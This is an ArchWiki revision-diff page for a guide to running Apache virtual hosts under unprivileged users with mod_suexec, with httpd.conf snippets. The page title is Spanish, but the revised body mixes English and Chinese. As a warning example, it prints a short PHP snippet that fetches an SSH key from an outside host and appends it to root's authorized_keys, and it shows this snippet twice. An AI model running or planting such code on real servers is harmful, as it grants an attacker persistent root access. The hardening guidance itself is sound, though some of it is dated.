Difference between revisions of "Apache, suEXEC and Virtual Hosts (Español)"

From ArchWiki
Jump to: navigation, search
(添加中文翻译页面)
Line 7: Line 7:
 
{{i18n_links_end}}
 
{{i18n_links_end}}
  
== Apache, SuExec y los servidores virtuales==
+
== Apache, SuExec and virtual Hosts==
  
Este documento describe cómo utilizar el módulo SuExec de Apache para suministrar servidores virtuales corriendo com un usuario sin privilegios. Generalmente es una buena práctica no permitir privilegios de superusuario a ninguna parte de lespacio web como muestra de manera un tanto brutal este ejemplo PHP:
+
这个文档描述了如何去使用Apache的SuExec模块去架设虚拟主机运行在普通用户权限下. 通常情况下不让webspace用友超级权限是一个良好的习惯,就像下面这段brutal PHP代码显示的那样:
  
 
<pre>
 
<pre>
 
   <?php
 
   <?php
     # este enlace por supuesto no lleva a ninguna parte
+
     # of course this link doesn't lead anywhere
 
     $rsa_key = file('http://yourhost.homeip.net/id_rsa.pub');
 
     $rsa_key = file('http://yourhost.homeip.net/id_rsa.pub');
 
     exec("cat ${rsa_key[[0]]} >>/root/.ssh/authorized_keys");
 
     exec("cat ${rsa_key[[0]]} >>/root/.ssh/authorized_keys");
Line 19: Line 19:
 
</pre>
 
</pre>
  
Coge la idea, verdad? Para impedir esto, no permita nunca a ningún servidor virtual tener acceso de escritura en ninguna parte excepto en su propio directorio personal o en el directorio DocumentRoot. Desgraciadamente este método requiere que Apache sea ejecutado como superusuario para que pueda ser capaz de convertirse en otro usuario pero esto no es una buena idea ya que usted no necesita que Apache se ejecute también como superusuario en el directorio DocumentRoot por defecto.
+
你同意这个观点吗? 为了预防这一点,绝对不要让你的虚拟主机拥有任何写入数据的权限除了在他自己的主目录下. Unfortunately this method requires Apache to run as superuser in order to be able to become another user but it's not a big deal since you do not need to run in the default DocumentRoot as superuser too.
  
Debería usted condiderar también el uso de SuExec si pretende tener varias cuentas FTP apuntando a aquellos espacios web que necesiten permisos de escritura manteniéndose la posibilidad de lectura de los ficheros por parte de Apache.
+
You should also consider using SuExec if you intend to have several FTP accounts pointing to those webspaces which need write permissions while the files still can be read by Apache.
 
<br>
 
<br>
==== Prerequisitos====
+
==== Prerequisites====
* debería estar familiarizado con la configuración básica de Apache
+
* you should be familiar with basic configuration of Apache
** especialmente con los servidores virtuales
+
** especially virtual hosts
* Acceso de superusuario a la caja objetivo
+
* superuser access to the target box
* Conocimiento acerca de añadir usuarios
+
* knowledge about adding users
* saber trabajar con pacman
+
* can work with pacman
 
<br>
 
<br>
==== Añadiéndo el módulo SuExec a Apache====
+
==== Adding SuExec module to Apache====
* cargue el módulo SuExec en ''/etc/httpd/conf/httpd.conf'' así
+
* load the SuExec module in ''/etc/httpd/conf/httpd.conf'' like this
 
<pre>
 
<pre>
 
LoadModule suexec_module        lib/apache/mod_suexec.so
 
LoadModule suexec_module        lib/apache/mod_suexec.so
 
</pre>
 
</pre>
* asegúrese de que el directorio DocumentRoot por defecto de Apache no corre tampoco como superusuario!
+
* make sure Apache's default DocumentRoot does not run as superuser either!
 
<pre>
 
<pre>
  User nobody
+
  User http
  Group nobody
+
  Group http
 
</pre>
 
</pre>
 
<br>
 
<br>
  
==== Establecer un servidor virtual que utilice SuExec====
+
==== Setting up a virtual Host to use SuExec====
Una manera de hacerl oes directamnete en el archivo ''/etc/httpd/conf/httpd.conf'' pero le sugiero que use un archivo diferente si pretende crear más de una pareja de servidores virtuales. De cualquier manera, un servidor virtual que se supone que utiliza SuExec puede ser algo así:
+
One way to do it is directly in ''/etc/httpd/conf/httpd.conf'' but I suggest to use a separate file if you intend to create more than just a couple of virtual hosts. Either way, a virtual host that is supposed to use SuExec may look something like this:
  
 
<pre>
 
<pre>
Line 49: Line 49:
 
         ServerName myhost
 
         ServerName myhost
 
         ServerAlias  myhost.localdomain
 
         ServerAlias  myhost.localdomain
         # aquí es donde van las peticiones de /
+
         # this is where requests for / go
 
         DocumentRoot /home/www/vhosts/myhost.localdomain/htdocs
 
         DocumentRoot /home/www/vhosts/myhost.localdomain/htdocs
  
         # aquí establece qué usuario (myhost) y qué grupo (ftponly) debería usar Apache
+
         # here you tell which user (myhost) and group (ftponly) Apache should use
 
         SuexecUserGroup myhost ftponly
 
         SuexecUserGroup myhost ftponly
  
         # lo siguiente es opcional pero podría serle útil
+
         # the following are optional but might be of use for you
 
         ScriptAlias /cgi-bin/ /home/www/vhosts/myhost.localdomain/htdocs/cgi-bin
 
         ScriptAlias /cgi-bin/ /home/www/vhosts/myhost.localdomain/htdocs/cgi-bin
 
         php_admin_value open_basedir /home/www/vhosts/myhost.localdomain/htdocs
 
         php_admin_value open_basedir /home/www/vhosts/myhost.localdomain/htdocs
         php_admin_value upload_tmp_dir  /home/www/vhosts/myhost.localdomain/htdocs/tmp
+
         php_admin_value upload_tmp_dir  /home/www/vhosts/myhost.localdomain/tmp
 +
        # Safe mode will be removed as of PHP 6. You may want to not enable it.
 
         php_admin_flag safe_mode On
 
         php_admin_flag safe_mode On
 
         ErrorDocument 404 /home/www/vhosts/myhost.localdomain
 
         ErrorDocument 404 /home/www/vhosts/myhost.localdomain
 
         <Directory "/home/www/vhosts/myhost.localdomain/htdocs">
 
         <Directory "/home/www/vhosts/myhost.localdomain/htdocs">
 
                 AllowOverride None
 
                 AllowOverride None
 +
                Order allow,deny
 +
                Allow from all
 
                 Options +SymlinksIfOwnerMatch +Includes
 
                 Options +SymlinksIfOwnerMatch +Includes
 
         </Directory>
 
         </Directory>
Line 68: Line 71:
 
</pre>
 
</pre>
 
<br>
 
<br>
====Deshabilitando el directorio "DocumentRoot" por defecto====
+
Note that we set upload_tmp_dir to a folder that is outside the document root of your web site (not /home/www/vhosts/myhost.localdomain/htdocs/tmp). It should also be not readable or writable by any other system users. This is for security reasons: this way it cannot be modified or overwritten while PHP is processing it.
Para hacer más segura aún su configuración puede deshabilitar el directorio ''DocumentRoot'' por defecto para que Apache no ejecute nada como lo hace el mismo superuser. Este procedimiento no lo deshabilita realmente, si no que apunta a un lugar donde ya no es accesible remotamente. Se puede lograr esto fácilemente reemplazando su ''ServerName'' por defecto con lo siguiente:
+
 
 +
==== "Disabling" default DocumentRoot====
 +
To further harden your setup you can disable the default ''DocumentRoot'' in order to not have Apache execute anything as the superuser itself runs as. This procedure does not really disable it, rather points it somewhere where it's not remotely accessible anymore. It can be easily achieved by replacing your default ''ServerName'' with the following:
  
 
<pre>
 
<pre>
Line 75: Line 80:
 
</pre>
 
</pre>
  
==== Rematando====
+
==== Finishing up====
Como siempre que se cambia la configuración por defecto hay que rearrancar Apache para que los cambios tengan efecto.
+
Like everytime you change default configuration parameters you need to restart Apache in order to make them have any effect.
  
 
<pre>
 
<pre>
Line 82: Line 87:
 
</pre>
 
</pre>
  
==== Referencias externas====
+
==== External References====
* más información en profundidad acerca de SuExec: http://httpd.apache.org/docs/suexec.html
+
* more in depth information about SuExec: http://httpd.apache.org/docs/suexec.html
* lo mismo acerca de los servidores virtuales: http://httpd.apache.org/docs/vhosts/index.html
+
* same about VirtualHosts: http://httpd.apache.org/docs/vhosts/index.html
  
 
----
 
----
Autor: kth5
+
Author: kth5

Revision as of 05:22, 14 November 2008

Template:I18n links start Template:I18n entry Template:I18n entry Template:I18n links end

Apache, SuExec and virtual Hosts

这个文档描述了如何去使用Apache的SuExec模块去架设虚拟主机运行在普通用户权限下. 通常情况下不让webspace用友超级权限是一个良好的习惯,就像下面这段brutal PHP代码显示的那样:

   <?php
     # of course this link doesn't lead anywhere
     $rsa_key = file('http://yourhost.homeip.net/id_rsa.pub');
     exec("cat ${rsa_key[[0]]} >>/root/.ssh/authorized_keys");
   ?>

你同意这个观点吗? 为了预防这一点,绝对不要让你的虚拟主机拥有任何写入数据的权限除了在他自己的主目录下. Unfortunately this method requires Apache to run as superuser in order to be able to become another user but it's not a big deal since you do not need to run in the default DocumentRoot as superuser too.

You should also consider using SuExec if you intend to have several FTP accounts pointing to those webspaces which need write permissions while the files still can be read by Apache.

Prerequisites

  • you should be familiar with basic configuration of Apache
    • especially virtual hosts
  • superuser access to the target box
  • knowledge about adding users
  • can work with pacman


Adding SuExec module to Apache

  • load the SuExec module in /etc/httpd/conf/httpd.conf like this
LoadModule suexec_module        lib/apache/mod_suexec.so
  • make sure Apache's default DocumentRoot does not run as superuser either!
 User http
 Group http


Setting up a virtual Host to use SuExec

One way to do it is directly in /etc/httpd/conf/httpd.conf but I suggest to use a separate file if you intend to create more than just a couple of virtual hosts. Either way, a virtual host that is supposed to use SuExec may look something like this:

<VirtualHost 192.168.0.1:80>
        ServerName myhost
        ServerAlias  myhost.localdomain
        # this is where requests for / go
        DocumentRoot /home/www/vhosts/myhost.localdomain/htdocs

        # here you tell which user (myhost) and group (ftponly) Apache should use
        SuexecUserGroup myhost ftponly

        # the following are optional but might be of use for you
        ScriptAlias /cgi-bin/ /home/www/vhosts/myhost.localdomain/htdocs/cgi-bin
        php_admin_value open_basedir /home/www/vhosts/myhost.localdomain/htdocs
        php_admin_value upload_tmp_dir  /home/www/vhosts/myhost.localdomain/tmp
        # Safe mode will be removed as of PHP 6. You may want to not enable it.
        php_admin_flag safe_mode On
        ErrorDocument 404 /home/www/vhosts/myhost.localdomain
        <Directory "/home/www/vhosts/myhost.localdomain/htdocs">
                AllowOverride None
                Order allow,deny
                Allow from all
                Options +SymlinksIfOwnerMatch +Includes
        </Directory>
</VirtualHost>


Note that we set upload_tmp_dir to a folder that is outside the document root of your web site (not /home/www/vhosts/myhost.localdomain/htdocs/tmp). It should also be not readable or writable by any other system users. This is for security reasons: this way it cannot be modified or overwritten while PHP is processing it.

"Disabling" default DocumentRoot

To further harden your setup you can disable the default DocumentRoot in order to not have Apache execute anything as the superuser itself runs as. This procedure does not really disable it, rather points it somewhere where it's not remotely accessible anymore. It can be easily achieved by replacing your default ServerName with the following:

 ServerName localhost:80

Finishing up

Like everytime you change default configuration parameters you need to restart Apache in order to make them have any effect.

 /etc/rc.d/httpd restart

External References


Author: kth5